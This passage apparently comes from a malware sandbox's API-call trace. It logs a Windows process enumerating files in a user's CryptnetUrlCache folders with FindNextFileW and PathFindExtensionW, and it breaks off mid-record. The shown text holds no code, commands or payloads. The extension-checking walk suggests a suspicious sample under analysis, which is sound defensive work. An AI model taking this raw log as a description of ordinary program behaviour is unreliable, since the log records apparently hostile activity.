hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.100] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x808d4a70, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x808d4a70, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x808d4a70, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x663, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C", cAlternateFileName="D52C56~1")) returned 1 [0237.100] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D52C56D8F24BEC96604372AFBAF264E1_E76A2B627DD019EB51D9335F24B14C2C") returned="" [0237.101] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.101] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x683e0540, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x683e0540, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f015a0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x64b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585", cAlternateFileName="EA6180~1")) returned 1 [0237.101] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\EA618097E393409AFA316F0F87E2C202_827C1B837652B048C4C84237D0838585") returned="" [0237.101] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.101] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf312b90, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf312b90, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf312b90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x64c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1", cAlternateFileName="F293AE~1")) returned 1 [0237.101] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F293AEAD5E84FACFB686C4A620718928_C8424A0B24A72939B13720D0C000C9C1") returned="" [0237.101] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.101] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x226, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 1 [0237.101] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\F90F18257CBB4D84216AC1E1F3BB2C76") returned="" [0237.101] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0237.101] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedbebcc0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xa989d730, ftLastWriteTime.dwHighDateTime=0x1d2fab4, nFileSizeHigh=0x0, nFileSizeLow=0x226, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="F90F18257CBB4D84216AC1E1F3BB2C76", cAlternateFileName="F90F18~1")) returned 0 [0237.101] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0237.102] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0237.102] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185fa8 | out: hHeap=0x630000) returned 1 [0237.102] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0237.102] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0237.102] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\") returned="MetaData\\" [0237.102] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\") returned="CryptnetUrlCache\\" [0237.102] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0237.102] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0237.103] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0237.103] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.103] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.103] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0237.103] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.103] PathFindFileNameW (pszPath="") returned="" [0237.103] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0237.105] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185cc8 | out: hHeap=0x630000) returned 1 [0237.105] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xd0de60b0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xd0de60b0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0237.106] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf9eaad0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf9eaad0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf9eaad0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x190, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B", cAlternateFileName="024823~1")) returned 1 [0237.107] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\024823B39FBEACCDB5C06426A8168E99_6D5CAB161A1C65362A913D29BE09D91B") returned="" [0237.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.107] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53bd8410, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53bd8410, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbe98d390, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x166, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875", cAlternateFileName="0F1583~1")) returned 1 [0237.107] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\0F1583FFF42FFF476A09801ACB69213F_E3F4A8C96454D7D3441D2C1BCE81F875") returned="" [0237.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.107] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf952550, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf952550, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf952550, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973", cAlternateFileName="1BB09B~1")) returned 1 [0237.107] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1BB09BEEC155258835C193A7AA85AA5B_A7B2B53AF2A12E2CB0A41B96D21D7973") returned="" [0237.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.107] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x4c00edb0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4c00edb0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4c00edb0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x10c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="1DAF2884EC4DFA96BA4A58D4DBC9C406", cAlternateFileName="1DAF28~1")) returned 1 [0237.107] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\1DAF2884EC4DFA96BA4A58D4DBC9C406") returned="" [0237.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0237.107] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x580eb5c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x580eb5c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaedd4300, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x124, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="23B523C9E7746F715D33C6527C18EB9D", cAlternateFileName="23B523~1")) returned 1 [0237.107] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\23B523C9E7746F715D33C6527C18EB9D") returned="" [0237.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0237.107] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xc3791460, ftCreationTime.dwHighDateTime=0x1d2e675, ftLastAccessTime.dwLowDateTime=0xc3791460, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc3791460, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0xdc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3130B1871A126520A8C47861EFE3ED4D", cAlternateFileName="3130B1~1")) returned 1 [0237.107] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3130B1871A126520A8C47861EFE3ED4D") returned="" [0237.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0237.107] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53fdc930, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53fdc930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbf16fc70, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x18a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D", cAlternateFileName="3388EC~1")) returned 1 [0237.107] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\3388ECC3F7BC4A9271C10ED8621E5A65_F55C512047947B70F94DE5DEC6D6838D") returned="" [0237.107] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.107] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x53b19d30, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53b19d30, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54583d70, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x190, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1", cAlternateFileName="40E450~1")) returned 1 [0237.107] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\40E450F7CE13419A2CCC2A5445035A0A_06F02B1F13AB4B11B8FC669BDE565AF1") returned="" [0237.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.108] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x54537ab0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54537ab0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae76e7e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x1ae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398", cAlternateFileName="4C8F84~1")) returned 1 [0237.108] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned="" [0237.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.108] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x7295ee20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7295ee20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xadfb2060, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", cAlternateFileName="4DD397~1")) returned 1 [0237.108] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned="" [0237.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.108] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf8b9fd0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf8b9fd0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf8b9fd0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", cAlternateFileName="5080DC~2")) returned 1 [0237.108] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned="" [0237.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.108] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf86dd10, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf86dd10, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf86dd10, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x190, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", cAlternateFileName="5080DC~1")) returned 1 [0237.108] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned="" [0237.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.108] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf763370, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf763370, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf7af630, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", cAlternateFileName="5457A8~1")) returned 1 [0237.108] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned="" [0237.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.108] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xed9b0820, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xed9b0820, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xed9b0820, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0xf4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="696F3DE637E6DE85B458996D49D759AD", cAlternateFileName="696F3D~1")) returned 1 [0237.108] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD") returned="" [0237.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0237.108] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf763370, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf763370, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf763370, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", cAlternateFileName="705A76~1")) returned 1 [0237.108] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned="" [0237.108] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.109] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedb2d5e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedb2d5e0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedb2d5e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x100, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7396C420A8E1BC1DA97F1AF0D10BAD21", cAlternateFileName="7396C4~1")) returned 1 [0237.109] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned="" [0237.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0237.109] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x540c1170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x540c1170, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x312640, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", cAlternateFileName="7423F8~1")) returned 1 [0237.109] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned="" [0237.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.109] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd48e2bf0, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0xdc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7B2238AACCEDC3F1FFE8E7EB5F575EC9", cAlternateFileName="7B2238~1")) returned 1 [0237.109] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned="" [0237.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0237.109] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6b2324c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6b2324c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x6b2324c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", cAlternateFileName="7B8944~1")) returned 1 [0237.109] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned="" [0237.109] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0237.109] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6b199f40, 